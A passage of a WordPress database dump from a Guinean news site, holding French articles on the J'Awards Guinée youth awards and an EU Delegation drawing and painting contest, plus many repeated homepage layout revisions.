12:44:53','','Jawards','','inherit','open','closed','','jawards','','','2017-10-30 12:44:53','2017-10-30 12:44:53','',678,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Jawards.jpg',0,'attachment','image/jpeg',0),(680,1,'2017-10-30 12:45:06','2017-10-30 12:45:06','Dans son intervention, le coordinateur de ladite structure, Moussa Daraba, a indiqué que l’objectif visé est de créer quelque chose de positif pour la jeunesse guinéenne qui représente plus de 60% de la population. «<em>C’est pourquoi nous avons décidé de créer les J’awards Guinée», </em>a-t-il dit. Concrètement, il s’agit de primer des jeunes qui ont excellé dans leurs domaines d’activité respectifs.\r\n\r\nSelon le responsable de la Commission chargée de la Pré-sélection,  Abdourahmane Baldé, une cinquantaine de jeunes seront retenus dans dix  catégories. Ensuite,  un comité de nomination mettra en avant les dix meilleurs qui vont se qualifier pour la finale.\r\n\r\n<em> «Nous avons voulu accorder une mention exceptionnelle aux premiers de la République des sciences mathématiques, sociales, et expérimentales de l’enseignement général et ceux des sciences expérimentales et sociales de l’enseignement franco arabe»,</em> a-t-il signalé\r\n\r\nPrésent à cette cérémonie, le ministre en charge de la Jeunesse a indiqué que c’est un honneur pour lui d’accompagner cette  jeune structure.\r\n\r\n<em>«C’est une fierté pour moi de voir des jeunes gens qui viennent s’exprimer de façon claire. Il faut que la jeunesse accepte de travailler.  Nous les félicitons pour cette initiative, nous les encourageons. Le gouvernement et le Président de la République soutiennent cette initiative», </em>a déclaré Moustapha Naité.\r\n\r\nLes organisateurs promettent de tout mettre en oeuvre avec leurs partenaires comme l’<em><a href=\"http://agsp.ovh/\">Association Guinéenne des Sciences Politiques (AGSP)</a></em>,  pour que cette première édition soit un succès.','J’Awards Guinée : la structure intelligentsia Guinée lance la 1ère édition','','inherit','closed','closed','','678-revision-v1','','','2017-10-30 12:45:06','2017-10-30 12:45:06','',678,'https://guineeinnove.nimbasolution.com/2017/10/30/678-revision-v1/',0,'revision','',0),(681,1,'2017-10-30 12:52:32','2017-10-30 12:52:32','Ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème:<strong> \"Culture et développement: quelle vision pour la Guinée de demain\"</strong> avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.\r\n\r\nÉpilogue du concours national de dessin et de peinture organisé par la Délégation de l\'Union européenne en Guinée. Ovations et sourires de satisfaction ont ponctué la cérémonie de remise des Prix organisée dans la salle des spectacles du Centre Culturel Franco-Guinéen en présence de la majorité des participants.\r\n\r\nLa cérémonie était présidée par l\'Ambassadeur, Chef de la Délégation de l\'Union européenne, M. Gerardus Gielen, en présence de trois de ses homologues des Etats membres en Guinée: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.\r\n\r\nC\'est le président du Jury, M. Ben Youssouf \"Oscar\" Barry qui a procédé à la proclamation des résultats après avoir rappelé les critères d\'évaluation définis et appliqués par les cinq membres du Jury, à savoir: <em>conformité au thème, originalité de l\'idée, créativité, compétence technique, sensibilité artistique</em>.\r\n\r\nLes trois lauréats, sur 61 participants, sont les suivants:\r\n<ul>\r\n 	<li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, sérigraphe, infographe. Outre un lot de gadgets offerts par la Délégation de l\'Union européenne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dotée d\'une application de dessin professionnel. Son œuvre est un dessin qui envisage le développement de la Guinée par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la réparation du tissu social.</li>\r\n</ul>\r\n<ul>\r\n 	<li>DEUXIÈME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitué d\'une tablette graphique <em>Intuos</em> tactile à stylet pour dessins et créations professionnelles. Son œuvre dessinée représente une jeune femme épanouie, cheveux dans le vent, se promenant dans une cité guinéenne moderne et ouverte au monde.</li>\r\n</ul>\r\n<ul>\r\n 	<li>TROISIÈME PRIX: BANGOURA Louis Isidore Katembè: 31 ans, réalisateur de formation, artiste polyvalent (musique, danse, théâtre, peinture, dessin, bricolage…). Il gagne une mallette multifonctions pour dessinateurs/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagné d\'un lot de gadgets estampillés \"Union européenne\". L\'œuvre de M. Bangoura est une vision de la Guinée développée à partir des ressources agricoles, énergétiques, le transport, l\'éducation et la préservation de l\'héritage culturel traditionnel.</li>\r\n</ul>\r\nDans le groupe des 10 premiers, les sept autres participants ont été distingués à travers des prix d\'encouragement.','Alpha Oumar Diallo gagne le concours national de dessin et de peinture.','','publish','open','open','','alpha-oumar-gagne-le-concours-national-de-dessin-et-de-peinture-organise-par-la-delegation-de-lunion-europeenne-en-guinee','','','2017-11-01 11:49:32','2017-11-01 11:49:32','',0,'https://guineeinnove.nimbasolution.com/?p=681',0,'post','',0),(682,1,'2017-10-30 12:52:22','2017-10-30 12:52:22','','Culture','','inherit','open','closed','','culture-3','','','2017-10-30 12:52:22','2017-10-30 12:52:22','',681,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Culture.jpg',0,'attachment','image/jpeg',0),(683,1,'2017-10-30 12:52:32','2017-10-30 12:52:32','','Alpha Oumar gagne le concours national de dessin et de peinture organisé par la Délégation de l\'Union européenne en Guinée.','','inherit','closed','closed','','681-revision-v1','','','2017-10-30 12:52:32','2017-10-30 12:52:32','',681,'https://guineeinnove.nimbasolution.com/2017/10/30/681-revision-v1/',0,'revision','',0),(684,1,'2017-10-30 12:55:39','2017-10-30 12:55:39','Ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème: \"Culture et développement: quelle vision pour la Guinée de demain\" avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.\n\nÉpilogue du concours national de dessin et de peinture organisé par la Délégation de l\'Union européenne en Guinée. Ovations et sourires de satisfaction ont ponctué la cérémonie de remise des Prix organisée ce jeudi 11 mai 2017 dans la salle des spectacles du Centre Culturel Franco-Guinéen en présence de la majorité des participants.\n\nLa cérémonie était présidée par l\'Ambassadeur, Chef de la Délégation de l\'Union européenne, M. Gerardus Gielen, en présence de trois de ses homologues des Etats membres en Guinée: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.\n\nC\'est le président du Jury, M. Ben Youssouf \"Oscar\" Barry qui a procédé à la proclamation des résultats après avoir rappelé les critères d\'évaluation définis et appliqués par les cinq membres du Jury, à savoir: <em>conformité au thème, originalité de l\'idée, créativité, compétence technique, sensibilité artistique</em>.\n\nLes trois lauréats, sur 61 participants, sont les suivants:\n<ul>\n 	<li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, sérigraphe, infographe. Outre un lot de gadgets offerts par la Délégation de l\'Union européenne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dotée d\'une application de dessin professionnel.</li>\n</ul>\n<ul>\n 	<li>Son œuvre est un dessin qui envisage le développement de la Guinée par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la réparation du tissu social.</li>\n</ul>\n<ul>\n 	<li>DEUXIÈME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitué d\'une tablette graphique <em>Intuos</em> tactile à stylet pour dessins et créations professionnelles.</li>\n</ul>\n<ul>\n 	<li>Son œuvre dessinée représente une jeune femme épanouie, cheveux dans le vent, se promenant dans une cité guinéenne moderne et ouverte au monde.</li>\n</ul>\n<ul>\n 	<li>TROISIÈME PRIX: BANGOURA Louis Isidore Katembè: 31 ans, réalisateur de formation, artiste polyvalent (musique, danse, théâtre, peinture, dessin, bricolage…). Il gagne une mallette multifonctions pour dessinateurs/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagné d\'un lot de gadgets estampillés \"Union européenne\".</li>\n</ul>\n<ul>\n 	<li>L\'œuvre de M. Bangoura est une vision de la Guinée développée à partir des ressources agricoles, énergétiques, le transport, l\'éducation et la préservation de l\'héritage culturel traditionnel.</li>\n</ul>\nDans le groupe des 10 premiers, les sept autres participants ont été distingués à travers des prix d\'encouragement; et tous les participants ont été gratifiés de <em>goodies</em> offerts par la Délégation.\n\nLes trophées et les Prix ont été remis par les Ambassadeurs.\n\nLe Chef de la Délégation de l\'Union européenne, M. Gielen, a salué et remercié les concurrents, ses homologues pour leur présence ainsi que tous ceux qui ont permis la réussite de l\'évènement et notamment le personnel du CCFG à travers son Directeur, M. Nicolas Doyard, qui a tenu à exprimer sa satisfaction d\'avoir pris part à l\'organisation du concours. Sans oublier l\'Institut Supérieur d\'Arts de Dubréka dont les étudiants ont massivement pris part au concours, ainsi que HAVAS Guinée partenaire de la Délégation pour diverses activités.\n\nDe leur côté, les trois lauréats ont pris la parole pour exprimer tour à tour leur satisfaction et leur fierté de remporter ces prix.\n\n<em>\"Tout est possible\" </em>a souligné, Alpha Oumar Diallo (Premier Prix). <em>\"Malgré mon handicap (</em>Il boîte d\'une jambe, NDLR<em>), je suis à mon troisième Prix après avoir remporté deux autres dont celui du logo du 50<sup>ème</sup> anniversaire d\'Indépendance de la Guinée\".</em> M. Diallo invite les artistes à compter sur leurs propres talents au lieu d\'attendre tout de l\'Etat providence.\n\nLa cérémonie a pris fin par la photo de famille, suivie de la visite de l\'exposition de toutes les œuvres du concours présentes au Centre Culturel et accessibles au public librement et gratuitement jusqu\'au 20 mai prochain.\n\nA rappeler que ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème: <strong><em>\"Culture et développement: quelle vision pour la Guinée de demain\"</em></strong> avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.\n\nLa cérémonie de remise des Prix et l\'exposition font partie d\'une série d\'activités culturelles (cinéma, quiz radio, etc.) célébrant la Semaine de l\'Europe 2017 organisée par la Délégation et les Etats membres.','Alpha Oumar gagne le concours national de dessin et de peinture.','','inherit','closed','closed','','681-autosave-v1','','','2017-10-30 12:55:39','2017-10-30 12:55:39','',681,'https://guineeinnove.nimbasolution.com/2017/10/30/681-autosave-v1/',0,'revision','',0),(685,1,'2017-10-30 12:56:55','2017-10-30 12:56:55','Ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème: \"Culture et développement: quelle vision pour la Guinée de demain\" avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.\r\n\r\nÉpilogue du concours national de dessin et de peinture organisé par la Délégation de l\'Union européenne en Guinée. Ovations et sourires de satisfaction ont ponctué la cérémonie de remise des Prix organisée dans la salle des spectacles du Centre Culturel Franco-Guinéen en présence de la majorité des participants.\r\n\r\nLa cérémonie était présidée par l\'Ambassadeur, Chef de la Délégation de l\'Union européenne, M. Gerardus Gielen, en présence de trois de ses homologues des Etats membres en Guinée: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.\r\n\r\nC\'est le président du Jury, M. Ben Youssouf \"Oscar\" Barry qui a procédé à la proclamation des résultats après avoir rappelé les critères d\'évaluation définis et appliqués par les cinq membres du Jury, à savoir: <em>conformité au thème, originalité de l\'idée, créativité, compétence technique, sensibilité artistique</em>.\r\n\r\nLes trois lauréats, sur 61 participants, sont les suivants:\r\n<ul>\r\n 	<li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, sérigraphe, infographe. Outre un lot de gadgets offerts par la Délégation de l\'Union européenne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dotée d\'une application de dessin professionnel.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Son œuvre est un dessin qui envisage le développement de la Guinée par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la réparation du tissu social.</li>\r\n</ul>\r\n<ul>\r\n 	<li>DEUXIÈME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitué d\'une tablette graphique <em>Intuos</em> tactile à stylet pour dessins et créations professionnelles.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Son œuvre dessinée représente une jeune femme épanouie, cheveux dans le vent, se promenant dans une cité guinéenne moderne et ouverte au monde.</li>\r\n</ul>\r\n<ul>\r\n 	<li>TROISIÈME PRIX: BANGOURA Louis Isidore Katembè: 31 ans, réalisateur de formation, artiste polyvalent (musique, danse, théâtre, peinture, dessin, bricolage…). Il gagne une mallette multifonctions pour dessinateurs/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagné d\'un lot de gadgets estampillés \"Union européenne\".</li>\r\n</ul>\r\n<ul>\r\n 	<li>L\'œuvre de M. Bangoura est une vision de la Guinée développée à partir des ressources agricoles, énergétiques, le transport, l\'éducation et la préservation de l\'héritage culturel traditionnel.</li>\r\n</ul>\r\nDans le groupe des 10 premiers, les sept autres participants ont été distingués à travers des prix d\'encouragement; et tous les participants ont été gratifiés de <em>goodies</em> offerts par la Délégation.\r\n\r\nLes trophées et les Prix ont été remis par les Ambassadeurs.\r\n\r\nLe Chef de la Délégation de l\'Union européenne, M. Gielen, a salué et remercié les concurrents, ses homologues pour leur présence ainsi que tous ceux qui ont permis la réussite de l\'évènement et notamment le personnel du CCFG à travers son Directeur, M. Nicolas Doyard, qui a tenu à exprimer sa satisfaction d\'avoir pris part à l\'organisation du concours. Sans oublier l\'Institut Supérieur d\'Arts de Dubréka dont les étudiants ont massivement pris part au concours, ainsi que HAVAS Guinée partenaire de la Délégation pour diverses activités.\r\n\r\nDe leur côté, les trois lauréats ont pris la parole pour exprimer tour à tour leur satisfaction et leur fierté de remporter ces prix.\r\n\r\n<em>\"Tout est possible\" </em>a souligné, Alpha Oumar Diallo (Premier Prix). <em>\"Malgré mon handicap (</em>Il boîte d\'une jambe, NDLR<em>), je suis à mon troisième Prix après avoir remporté deux autres dont celui du logo du 50<sup>ème</sup> anniversaire d\'Indépendance de la Guinée\".</em> M. Diallo invite les artistes à compter sur leurs propres talents au lieu d\'attendre tout de l\'Etat providence.\r\n\r\nLa cérémonie a pris fin par la photo de famille, suivie de la visite de l\'exposition de toutes les œuvres du concours présentes au Centre Culturel et accessibles au public librement et gratuitement jusqu\'au 20 mai prochain.\r\n\r\nA rappeler que ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème: <strong><em>\"Culture et développement: quelle vision pour la Guinée de demain\"</em></strong> avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.\r\n\r\nLa cérémonie de remise des Prix et l\'exposition font partie d\'une série d\'activités culturelles (cinéma, quiz radio, etc.) célébrant la Semaine de l\'Europe 2017 organisée par la Délégation et les Etats membres.','Alpha Oumar Diallo gagne le concours national de dessin et de peinture.','','inherit','closed','closed','','681-revision-v1','','','2017-10-30 12:56:55','2017-10-30 12:56:55','',681,'https://guineeinnove.nimbasolution.com/2017/10/30/681-revision-v1/',0,'revision','',0),(740,1,'2017-10-30 13:05:52','2017-10-30 13:05:52','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:05:52','2017-10-30 13:05:52','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(741,1,'2017-10-30 13:11:48','2017-10-30 13:11:48','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:11:48','2017-10-30 13:11:48','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(742,1,'2017-10-30 13:13:07','2017-10-30 13:13:07','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:13:07','2017-10-30 13:13:07','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(743,1,'2017-10-30 13:13:36','2017-10-30 13:13:36','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:13:36','2017-10-30 13:13:36','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(744,1,'2017-10-30 13:15:03','2017-10-30 13:15:03','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:15:03','2017-10-30 13:15:03','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(745,1,'2017-10-30 13:16:00','2017-10-30 13:16:00','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:16:00','2017-10-30 13:16:00','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(746,1,'2017-10-30 13:16:44','2017-10-30 13:16:44','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:16:44','2017-10-30 13:16:44','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(747,1,'2017-10-30 13:17:06','2017-10-30 13:17:06','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:17:06','2017-10-30 13:17:06','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(748,1,'2017-10-30 13:17:39','2017-10-30 13:17:39','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:17:39','2017-10-30 13:17:39','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(749,1,'2017-10-30 13:18:18','2017-10-30 13:18:18','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:18:18','2017-10-30 13:18:18','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(750,1,'2017-10-30 13:19:02','2017-10-30 13:19:02','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:19:02','2017-10-30 13:19:02','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(751,1,'2017-10-30 13:21:48','2017-10-30 13:21:48','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:21:48','2017-10-30 13:21:48','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(752,1,'2017-10-30 13:23:56','2017-10-30 13:23:56','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:23:56','2017-10-30 13:23:56','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(753,1,'2017-10-30 13:24:56','2017-10-30 13:24:56','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:24:56','2017-10-30 13:24:56','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(754,1,'2017-10-30 13:28:53','2017-10-30 13:28:53','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:28:53','2017-10-30 13:28:53','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(755,1,'2017-10-30 13:29:05','2017-10-30 13:29:05','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:29:05','2017-10-30 13:29:05','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(756,1,'2017-10-30 13:30:03','2017-10-30 13:30:03','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:30:03','2017-10-30 13:30:03','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(757,1,'2017-10-30 13:34:26','2017-10-30 13:34:26','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:34:26','2017-10-30 13:34:26','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(758,1,'2017-10-30 13:34:39','2017-10-30 13:34:39','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:34:39','2017-10-30 13:34:39','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(759,1,'2017-10-30 13:35:05','2017-10-30 13:35:05','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:35:05','2017-10-30 13:35:05','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(760,1,'2017-10-30 13:35:17','2017-10-30 13:35:17','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:35:17','2017-10-30 13:35:17','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(761,1,'2017-10-30 13:35:38','2017-10-30 13:35:38','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:35:38','2017-10-30 13:35:38','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(762,1,'2017-10-30 13:36:34','2017-10-30 13:36:34','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:36:34','2017-10-30 13:36:34','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(763,1,'2017-10-30 13:48:11','2017-10-30 13:48:11','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		